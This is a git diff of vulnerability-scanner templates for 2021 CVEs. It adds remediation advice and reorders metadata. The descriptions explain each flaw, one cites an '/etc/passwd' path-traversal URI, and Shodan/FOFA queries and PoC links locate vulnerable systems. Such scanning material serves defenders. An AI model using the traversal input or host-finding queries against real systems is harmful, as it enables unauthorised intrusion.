unauthorized attacker with network access to View Planner Harness could upload and execute a specially crafted file leading to remote code execution within the logupload container. + remediation: | + Upgrade to VMware View Planner version 4.6 SP1 or later to mitigate this vulnerability. reference: - https://twitter.com/osama_hroot/status/1367258907601698816 - https://nvd.nist.gov/vuln/detail/CVE-2021-21978 @@ -19,8 +21,8 @@ info: cve-id: CVE-2021-21978 cwe-id: CWE-20 epss-score: 0.97519 - cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* epss-percentile: 0.99976 + cpe: cpe:2.3:a:vmware:view_planner:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2021/CVE-2021-21985.yaml b/http/cves/2021/CVE-2021-21985.yaml index f751101ccb..a9813fb595 100644 --- a/http/cves/2021/CVE-2021-21985.yaml +++ b/http/cves/2021/CVE-2021-21985.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. + remediation: | + Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability. reference: - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - https://github.com/alt3kx/CVE-2021-21985_PoC @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-21985 cwe-id: CWE-20 epss-score: 0.97454 - cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:* epss-percentile: 0.99926 + cpe: cpe:2.3:a:vmware:vcenter_server:6.5:-:*:*:*:*:*:* metadata: max-request: 1 vendor: vmware diff --git a/http/cves/2021/CVE-2021-22005.yaml b/http/cves/2021/CVE-2021-22005.yaml index 42e85e49cf..13adc4933a 100644 --- a/http/cves/2021/CVE-2021-22005.yaml +++ b/http/cves/2021/CVE-2021-22005.yaml @@ -5,6 +5,8 @@ info: author: PR3R00T severity: critical description: VMware vCenter Server contains an arbitrary file upload vulnerability in the Analytics service. A malicious actor with network access to port 443 on vCenter Server may exploit this issue to execute code on vCenter Server by uploading a specially crafted file. + remediation: | + Apply the necessary security patches or updates provided by VMware reference: - https://kb.vmware.com/s/article/85717 - https://www.vmware.com/security/advisories/VMSA-2021-0020.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-22005 cwe-id: CWE-22 epss-score: 0.97237 - cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* epss-percentile: 0.99755 + cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: vmware diff --git a/http/cves/2021/CVE-2021-22053.yaml b/http/cves/2021/CVE-2021-22053.yaml index 37b22e6061..82c3b70e18 100644 --- a/http/cves/2021/CVE-2021-22053.yaml +++ b/http/cves/2021/CVE-2021-22053.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution. + remediation: | + Upgrade to Spring Cloud Netflix Hystrix Dashboard version 2.2.10 or later to mitigate this vulnerability. reference: - https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053 - https://tanzu.vmware.com/security/cve-2021-22053 @@ -16,12 +18,12 @@ info: cve-id: CVE-2021-22053 cwe-id: CWE-94 epss-score: 0.7163 - cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* epss-percentile: 0.97629 + cpe: cpe:2.3:a:vmware:spring_cloud_netflix:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: spring_cloud_netflix vendor: vmware + product: spring_cloud_netflix tags: rce,spring,cve,cve2021 http: diff --git a/http/cves/2021/CVE-2021-22054.yaml b/http/cves/2021/CVE-2021-22054.yaml index a3c97613f3..cb6350a7b7 100644 --- a/http/cves/2021/CVE-2021-22054.yaml +++ b/http/cves/2021/CVE-2021-22054.yaml @@ -5,6 +5,8 @@ info: author: h1ei1 severity: high description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information. + remediation: | + Apply the necessary patches or updates provided by VMWare to fix the vulnerability. reference: - https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/ - https://www.vmware.com/security/advisories/VMSA-2021-0029.html @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-22054 cwe-id: CWE-918 epss-score: 0.76256 - cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* epss-percentile: 0.97769 + cpe: cpe:2.3:a:vmware:workspace_one_uem_console:*:*:*:*:*:*:*:* metadata: max-request: 1 - fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" vendor: vmware product: workspace_one_uem_console + fofa-query: banner="/AirWatch/default.aspx" || header="/AirWatch/default.aspx" tags: cve,cve2021,vmware,workspace,ssrf http: diff --git a/http/cves/2021/CVE-2021-22122.yaml b/http/cves/2021/CVE-2021-22122.yaml index 8a2c656674..422b517aa4 100644 --- a/http/cves/2021/CVE-2021-22122.yaml +++ b/http/cves/2021/CVE-2021-22122.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | FortiWeb 6.3.0 through 6.3.7 and versions before 6.2.4 contain an unauthenticated cross-site scripting vulnerability. Improper neutralization of input during web page generation can allow a remote attacker to inject malicious payload in vulnerable API end-points. + remediation: | + Apply the latest security patches or updates provided by Fortinet to fix the XSS vulnerability in FortiWeb. reference: - https://www.fortiguard.com/psirt/FG-IR-20-122 - https://twitter.com/ptswarm/status/1357316793753362433 @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-22122 cwe-id: CWE-79 epss-score: 0.11206 - cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* epss-percentile: 0.94436 + cpe: cpe:2.3:a:fortinet:fortiweb:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: fortinet diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml index 6891d25a16..e8fcc2023b 100644 --- a/http/cves/2021/CVE-2021-22145.yaml +++ b/http/cves/2021/CVE-2021-22145.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations. + remediation: | + Upgrade Elasticsearch to a version that is not affected by CVE-2021-22145. reference: - https://github.com/jaeles-project/jaeles-signatures/blob/e9595197c80521d64e31b846808095dd07c407e9/cves/elasctic-memory-leak-cve-2021-22145.yaml - https://packetstormsecurity.com/files/163648/ElasticSearch-7.13.3-Memory-Disclosure.html @@ -17,8 +19,8 @@ info: cve-id: CVE-2021-22145 cwe-id: CWE-209 epss-score: 0.36411 - cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* epss-percentile: 0.96626 + cpe: cpe:2.3:a:elastic:elasticsearch:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: elastic diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml index a5fa65008b..38b481b42f 100644 --- a/http/cves/2021/CVE-2021-22205.yaml +++ b/http/cves/2021/CVE-2021-22205.yaml @@ -5,6 +5,8 @@ info: author: GitLab Red Team severity: critical description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below. + remediation: | + Upgrade to GitLab CE/EE version 13.10.3 or 13.11.1 to mitigate this vulnerability. reference: - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-research/cve-2021-22205-hash-generator - https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/red-team-operations/-/issues/196 @@ -19,13 +21,13 @@ info: cve-id: CVE-2021-22205 cwe-id: CWE-94 epss-score: 0.97419 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* epss-percentile: 0.9989 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: max-request: 1 - shodan-query: http.title:"GitLab" vendor: gitlab product: gitlab + shodan-query: http.title:"GitLab" tags: kev,hackerone,cve,cve2021,gitlab,rce http: diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml index daff573204..2e91a4bb49 100644 --- a/http/cves/2021/CVE-2021-22214.yaml +++ b/http/cves/2021/CVE-2021-22214.yaml @@ -9,6 +9,8 @@ info: - CVE-2021-39935 - CVE-2021-22214 - CVE-2021-22175 + remediation: | + Upgrade Gitlab CE/EE to a version that is not affected by the vulnerability (10.6 or higher). reference: - https://nvd.nist.gov/vuln/detail/CVE-2021-22214 - https://nvd.nist.gov/vuln/detail/CVE-2021-39935 @@ -21,13 +23,13 @@ info: cve-id: CVE-2021-22214 cwe-id: CWE-918 epss-score: 0.12503 - cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* epss-percentile: 0.94709 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"GitLab" vendor: gitlab product: gitlab + shodan-query: http.title:"GitLab" tags: cve,cve2021,gitlab,ssrf http: diff --git a/http/cves/2021/CVE-2021-22502.yaml b/http/cves/2021/CVE-2021-22502.yaml index b7ae2e4e9c..4a583abb61 100644 --- a/http/cves/2021/CVE-2021-22502.yaml +++ b/http/cves/2021/CVE-2021-22502.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Micro Focus Operations Bridge Reporter 10.40 is susceptible to remote code execution. An attacker can potentially execute malware, obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials. + remediation: | + Apply the latest security patches or updates provided by Micro Focus to mitigate this vulnerability. reference: - https://github.com/pedrib/PoC/blob/master/advisories/Micro_Focus/Micro_Focus_OBR.md - https://softwaresupport.softwaregrp.com/doc/KM03775947 @@ -18,8 +20,8 @@ info: cve-id: CVE-2021-22502 cwe-id: CWE-78 epss-score: 0.9745 - cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* epss-percentile: 0.9992 + cpe: cpe:2.3:a:microfocus:operation_bridge_reporter:10.40:*:*:*:*:*:*:* metadata: max-request: 1 vendor: microfocus diff --git a/http/cves/2021/CVE-2021-22707.yaml b/http/cves/2021/CVE-2021-22707.yaml index 0d13ecab7e..11c414883a 100644 --- a/http/cves/2021/CVE-2021-22707.yaml +++ b/http/cves/2021/CVE-2021-22707.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges. + remediation: | + Upgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability. reference: - https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh - https://nvd.nist.gov/vuln/detail/CVE-2021-22707 @@ -16,15 +18,15 @@ info: cve-id: CVE-2021-22707 cwe-id: CWE-798 epss-score: 0.3812 - cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.96713 + cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true - shodan-query: title:"EVSE web interface" - fofa-query: title="EVSE web interface" + max-request: 1 vendor: schneider-electric product: evlink_city_evc1s22p4_firmware + shodan-query: title:"EVSE web interface" + fofa-query: title="EVSE web interface" tags: cve,cve2021,evlink,auth-bypass http: diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml index b54257f575..f0e819e358 100644 --- a/http/cves/2021/CVE-2021-22873.yaml +++ b/http/cves/2021/CVE-2021-22873.yaml @@ -5,6 +5,8 @@ info: author: pudsec severity: medium description: Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade Revive Adserver to version 5.1.0 or later to mitigate this vulnerability. reference: - https://hackerone.com/reports/1081406 - https://github.com/revive-adserver/revive-adserver/issues/1068 @@ -17,14 +19,14 @@ info: cve-id: CVE-2021-22873 cwe-id: CWE-601 epss-score: 0.00867 - cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* epss-percentile: 0.80246 + cpe: cpe:2.3:a:revive-adserver:revive_adserver:*:*:*:*:*:*:*:* metadata: - max-request: 6 - shodan-query: http.favicon.hash:106844876 verified: true + max-request: 6 vendor: revive-adserver product: revive_adserver + shodan-query: http.favicon.hash:106844876 tags: hackerone,seclists,packetstorm,cve2021,redirect,revive,cve http: diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml index 04bbac2cb2..68fb332a78 100644 --- a/http/cves/2021/CVE-2021-22911.yaml +++ b/http/cves/2021/CVE-2021-22911.yaml @@ -5,6 +5,8 @@ info: author: tess,sullo severity: critical description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + remediation: | + Upgrade Rocket.Chat to a version higher than 3.13 or apply the provided patch to mitigate the vulnerability. reference: - http://packetstormsecurity.com/files/162997/Rocket.Chat-3.12.1-NoSQL-Injection-Code-Execution.html - https://github.com/vulhub/vulhub/tree/master/rocketchat/CVE-2021-22911 @@ -18,14 +20,14 @@ info: cve-id: CVE-2021-22911 cwe-id: CWE-75,NVD-CWE-Other epss-score: 0.94897 - cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:* epss-percentile: 0.98981 + cpe: cpe:2.3:a:rocket.chat:rocket.chat:3.11.0:-:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.title:"Rocket.Chat" verified: true + max-request: 1 vendor: rocket.chat product: rocket.chat + shodan-query: http.title:"Rocket.Chat" tags: rocketchat,nosqli,packetstorm,vulhub,hackerone,cve,cve2021 http: diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml index c3eff47dfa..48afbdf66a 100644 --- a/http/cves/2021/CVE-2021-22986.yaml +++ b/http/cves/2021/CVE-2021-22986.yaml @@ -5,6 +5,8 @@ info: author: rootxharsh,iamnoooob severity: critical description: F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2. + remediation: | + Apply the necessary security patches or updates provided by F5 Networks to mitigate the vulnerability. reference: - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 - https://support.f5.com/csp/article/K03009991 @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-22986 cwe-id: CWE-918 epss-score: 0.97452 - cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* epss-percentile: 0.99923 + cpe: cpe:2.3:a:f5:big-ip_access_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: f5 diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml index 023b22cde2..896861a941 100644 --- a/http/cves/2021/CVE-2021-23241.yaml +++ b/http/cves/2021/CVE-2021-23241.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI. + remediation: | + Apply the latest firmware update provided by the vendor to fix the LFI vulnerability and ensure proper input validation is implemented. reference: - https://github.com/BATTZION/MY_REQUEST/blob/master/Mercury%20Router%20Web%20Server%20Directory%20Traversal.md - https://www.mercusys.com/en/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2021-23241 cwe-id: CWE-22 epss-score: 0.00321 - cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:* epss-percentile: 0.66807 + cpe: cpe:2.3:o:mercusys:mercury_x18g_firmware:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mercusys diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml index 41b3bf8fbe..8da2779bdb 100644 --- a/http/cves/2021/CVE-2021-24145.yaml +++ b/http/cves/2021/CVE-2021-24145.yaml @@ -6,26 +6,26 @@ info: severity: high description: | WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution. + remediation: Fixed in version 5.16.5. reference: - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610 - https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.15.5.zip - https://github.com/dnr6419/CVE-2021-24145 - https://nvd.nist.gov/vuln/detail/CVE-2021-24145 - remediation: Fixed in version 5.16.5. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24145 cwe-id: CWE-434 epss-score: 0.93112 - cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* epss-percentile: 0.98681 + cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: - max-request: 3 verified: true - framework: wordpress + max-request: 3 vendor: webnus product: modern_events_calendar_lite + framework: wordpress tags: auth,wpscan,cve,wordpress,wp-plugin,wp,modern-events-calendar-lite,cve2021,rce,intrusive http: diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml index edb7a51de9..6fe33982e4 100644 --- a/http/cves/2021/CVE-2021-24146.yaml +++ b/http/cves/2021/CVE-2021-24146.yaml @@ -5,6 +5,8 @@ info: author: random_robbie severity: high description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format. + remediation: | + Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability. reference: - https://wpscan.com/vulnerability/c7b1ebd6-3050-4725-9c87-0ea525f8fecc - http://packetstormsecurity.com/files/163345/WordPress-Modern-Events-Calendar-5.16.2-Information-Disclosure.html @@ -15,13 +17,13 @@ info: cve-id: CVE-2021-24146 cwe-id: CWE-862,CWE-284 epss-score: 0.02392 - cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* epss-percentile: 0.88487 + cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: webnus product: modern_events_calendar_lite + framework: wordpress tags: cve2021,wpscan,packetstorm,wordpress,wp-plugin,cve http: diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml index 5bb278ab05..311285082e 100644 --- a/http/cves/2021/CVE-2021-24150.yaml +++ b/http/cves/2021/CVE-2021-24150.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Update the WordPress Like Button Rating plugin to version 2.6.32 or later. reference: - https://wpscan.com/vulnerability/6bc6023f-a5e7-4665-896c-95afa5b638fb - https://wordpress.org/plugins/likebtn-like-button/ @@ -16,14 +18,14 @@ info: cve-id: CVE-2021-24150 cwe-id: CWE-918 epss-score: 0.02513 - cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:* epss-percentile: 0.88746 + cpe: cpe:2.3:a:likebtn-like-button_project:likebtn-like-button:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: likebtn-like-button_project product: likebtn-like-button + framework: wordpress tags: cve,cve2021,wordpress,wp-plugin,wp,ssrf,wpscan,unauth,likebtn-like-button http: diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml index 86b3bcf025..66915fe945 100644 --- a/http/cves/2021/CVE-2021-24155.yaml +++ b/http/cves/2021/CVE-2021-24155.yaml @@ -6,26 +6,26 @@ info: severity: high description: | WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution. + remediation: Fixed in version 1.6.0. reference: - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb - https://wordpress.org/plugins/backup/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24155 - http://packetstormsecurity.com/files/163382/WordPress-Backup-Guard-1.5.8-Shell-Upload.html - remediation: Fixed in version 1.6.0. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H cvss-score: 7.2 cve-id: CVE-2021-24155 cwe-id: CWE-434 epss-score: 0.95167 - cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:* epss-percentile: 0.99034 + cpe: cpe:2.3:a:backup-guard:backup_guard:*:*:*:*:*:wordpress:*:* metadata: - max-request: 4 verified: true - framework: wordpress + max-request: 4 vendor: backup-guard product: backup_guard + framework: wordpress tags: authenticated,wp,packetstorm,wp-plugin,cve2021,rce,wordpress,cve,backup,wpscan,intrusive http: diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml index ad4ae02bb5..f330c0f405 100644 --- a/http/cves/2021/CVE-2021-24165.yaml +++ b/http/cves/2021/CVE-2021-24165.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Update to the latest version of the Ninja Forms plugin (3.4.34 or higher) to fix the open redirect vulnerability. reference: - https://wpscan.com/vulnerability/6147acf5-e43f-47e6-ab56-c9c8be584818 - https://www.wordfence.com/blog/2021/02/one-million-sites-affected-four-severe-vulnerabilities-patched-in-ninja-forms/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24165 cwe-id: CWE-601 epss-score: 0.00116 - cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44596 + cpe: cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 - framework: wordpress vendor: ninjaforms product: ninja_forms + framework: wordpress tags: cve,cve2021,wordpress,redirect,wp-plugin,authenticated,wp,wpscan http: diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml index 196aa642ce..5e659da917 100644 --- a/http/cves/2021/CVE-2021-24169.yaml +++ b/http/cves/2021/CVE-2021-24169.yaml @@ -6,26 +6,26 @@ info: severity: medium description: | WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: Fixed in version 3.1.8. reference: - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3 - https://www.exploit-db.com/exploits/50324 - https://wordpress.org/plugins/woo-order-export-lite/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24169 - remediation: Fixed in version 3.1.8. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-24169 cwe-id: CWE-79 epss-score: 0.00183 - cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* epss-percentile: 0.54871 + cpe: cpe:2.3:a:algolplus:advanced_order_export:*:*:*:*:*:wordpress:*:* metadata: - max-request: 2 verified: true - framework: wordpress + max-request: 2 vendor: algolplus product: advanced_order_export + framework: wordpress tags: wordpress,authenticated,wpscan,cve,cve2021,xss,wp-plugin,wp,woo-order-export-lite,edb http: diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml index 9598a8510b..fa5198b5b3 100644 --- a/http/cves/2021/CVE-2021-24176.yaml +++ b/http/cves/2021/CVE-2021-24176.yaml @@ -5,6 +5,8 @@ info: author: Ganofins severity: medium description: WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code. + remediation: | + Update to the latest version of WordPress JH 404 Logger plugin (>=1.2) which addresses the XSS vulnerability. reference: - https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585 - https://wordpress.org/plugins/jh-404-logger/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24176 cwe-id: CWE-79 epss-score: 0.00136 - cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:* epss-percentile: 0.48282 + cpe: cpe:2.3:a:jh_404_logger_project:jh_404_logger:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: jh_404_logger_project product: jh_404_logger + framework: wordpress tags: cve,cve2021,wordpress,wp-plugin,xss,wpscan http: diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml index fdadb44386..476ba29200 100644 --- a/http/cves/2021/CVE-2021-24210.yaml +++ b/http/cves/2021/CVE-2021-24210.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Update the WordPress PhastPress plugin to version 1.111 or later to mitigate the vulnerability. reference: - https://wpscan.com/vulnerability/9b3c5412-8699-49e8-b60c-20d2085857fb - https://plugins.trac.wordpress.org/changeset/2497610/ @@ -16,13 +18,13 @@ info: cve-id: CVE-2021-24210 cwe-id: CWE-601 epss-score: 0.00116 - cpe: cpe:2.3:a:kiboit:phastpress:*:*:*:*:*:wordpress:*:* epss-percentile: 0.44596 + cpe: cpe:2.3:a:kiboit:phastpress:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: kiboit product: phastpress + framework: wordpress tags: cve2021,redirect,wpscan,wordpress,cve http: diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml index 0b7d049745..b237332eb0 100644 --- a/http/cves/2021/CVE-2021-24214.yaml +++ b/http/cves/2021/CVE-2021-24214.yaml @@ -5,6 +5,8 @@ info: author: tess severity: medium description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration. + remediation: | + Update to the latest version of the WordPress OpenID Connect Generic Client plugin (3.8.2) to fix this vulnerability. reference: - https://wpscan.com/vulnerability/31cf0dfb-4025-4898-a5f4-fc7115565a10 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24214 @@ -15,14 +17,14 @@ info: cve-id: CVE-2021-24214 cwe-id: CWE-79 epss-score: 0.00369 - cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* epss-percentile: 0.69091 + cpe: cpe:2.3:a:daggerhartlab:openid_connect_generic_client:3.8.0:*:*:*:*:wordpress:*:* metadata: - max-request: 1 verified: true - framework: wordpress + max-request: 1 vendor: daggerhartlab product: openid_connect_generic_client + framework: wordpress tags: wpscan,cve,cve2021,wordpress,xss,wp-plugin,wp,openid http: diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml index 90a2856bc8..f8a58238a6 100644 